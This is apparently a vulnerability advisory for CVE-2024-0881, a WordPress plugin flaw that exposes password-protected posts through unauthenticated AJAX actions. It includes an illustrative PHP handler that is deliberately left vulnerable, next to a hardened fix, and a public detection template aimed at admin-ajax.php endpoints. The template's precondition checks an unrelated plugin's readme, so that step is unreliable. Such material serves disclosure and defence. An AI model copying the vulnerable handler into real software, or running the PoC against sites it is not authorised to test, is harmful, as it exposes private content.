CVE-2024-0881: Combo Blocks < 2.2.76 - Improper Access Control

Date: 2025-08-01 | Affected software: Combo Blocks | PoC: public

Vulnerability description

The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts.
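
The class of bug described above is easiest to see in code. The following is an added example, not code from the Combo Blocks plugin: a minimal admin-ajax.php handler that returns rendered posts, first in the vulnerable shape (no password check at all) and then hardened with the WordPress core check. The action name `example_grid_search` and both function names are assumptions chosen for illustration; the WordPress API calls (`WP_Query`, `post_password_required`, `get_the_password_form`, `wp_send_json`, `wp_ajax_nopriv_*`) are real.

```php
<?php
/**
 * Added example, not code from the Combo Blocks plugin. The action name
 * "example_grid_search" and the function names are assumptions.
 */

/**
 * Vulnerable shape: every published post matching the search is rendered
 * in full. WP_Query returns password-protected posts like any other
 * published post, and nothing here consults post_password_required(),
 * so an unauthenticated caller receives the protected body.
 */
function example_grid_search_vulnerable() {
    $search = isset( $_GET['s'] ) ? sanitize_text_field( wp_unslash( $_GET['s'] ) ) : '';
    $query  = new WP_Query( array(
        'post_type'      => 'post',
        'post_status'    => 'publish',
        'posts_per_page' => 10,
        's'              => $search,
    ) );

    $html = '';
    foreach ( $query->posts as $post ) {
        $html .= '<div class="item"><h3>' . esc_html( get_the_title( $post ) ) . '</h3>'
               . wp_kses_post( $post->post_content ) . '</div>';
    }
    wp_send_json( array( 'html' => $html, 'pagination' => '' ) );
}

/**
 * Hardened shape: for each post, ask core whether it still requires a
 * password for the current visitor. post_password_required() honours the
 * wp-postpass_* cookie, so a visitor who already entered the password keeps
 * seeing the post; everyone else gets the standard password form instead
 * of the content, exactly as the normal front-end loop would render it.
 */
function example_grid_search_hardened() {
    $search = isset( $_GET['s'] ) ? sanitize_text_field( wp_unslash( $_GET['s'] ) ) : '';
    $query  = new WP_Query( array(
        'post_type'      => 'post',
        'post_status'    => 'publish',
        'posts_per_page' => 10,
        's'              => $search,
    ) );

    $html = '';
    foreach ( $query->posts as $post ) {
        $html .= '<div class="item"><h3>' . esc_html( get_the_title( $post ) ) . '</h3>';
        if ( post_password_required( $post ) ) {
            // Never emit the body of a protected post; show the prompt instead.
            $html .= get_the_password_form( $post );
        } else {
            $html .= wp_kses_post( $post->post_content );
        }
        $html .= '</div>';
    }
    wp_send_json( array( 'html' => $html, 'pagination' => '' ) );
}

// Register the hardened handler for both logged-in and anonymous callers.
// The wp_ajax_nopriv_* hook is precisely the path an unauthenticated
// request to admin-ajax.php?action=example_grid_search takes.
add_action( 'wp_ajax_example_grid_search',        'example_grid_search_hardened' );
add_action( 'wp_ajax_nopriv_example_grid_search', 'example_grid_search_hardened' );
```

If the endpoint has no reason to list protected posts at all, adding `'has_password' => false` to the `WP_Query` arguments excludes them at query time, which also keeps their titles out of the listing; the per-post `post_password_required()` check above is the better fit when visitors who know the password should still see the post. Either way, the point is that an AJAX handler reachable through `wp_ajax_nopriv_*` is front-end output and must apply the same password gate the theme loop applies.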

PoC code [public]

id: CVE-2024-0881

info:
  name: Combo Blocks < 2.2.76 - Improper Access Control
  author: s4e-io
  severity: medium
  description: |
    The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
  reference:
    - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0881
  classification:
    cve-id: CVE-2024-0881
    cwe-id: CWE-284
    epss-score: 0.13073
    epss-percentile: 0.93867
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/user-meta/"
  tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"

    matchers:
      - type: word
        internal: true
        words:
          - "User Profile Builder"

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"html"'
          - '"<div class='
          - '"pagination":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210086302b4e42dcba20c2aadacc4eae6b888ce158c3ffce1e6e5e8fd4d107545f8c02205c5d4148377eb5b95178eab9a928c1fb56cf9b62317f8781593ae10f446def40:922c64590222798bb761d5b6d8e72950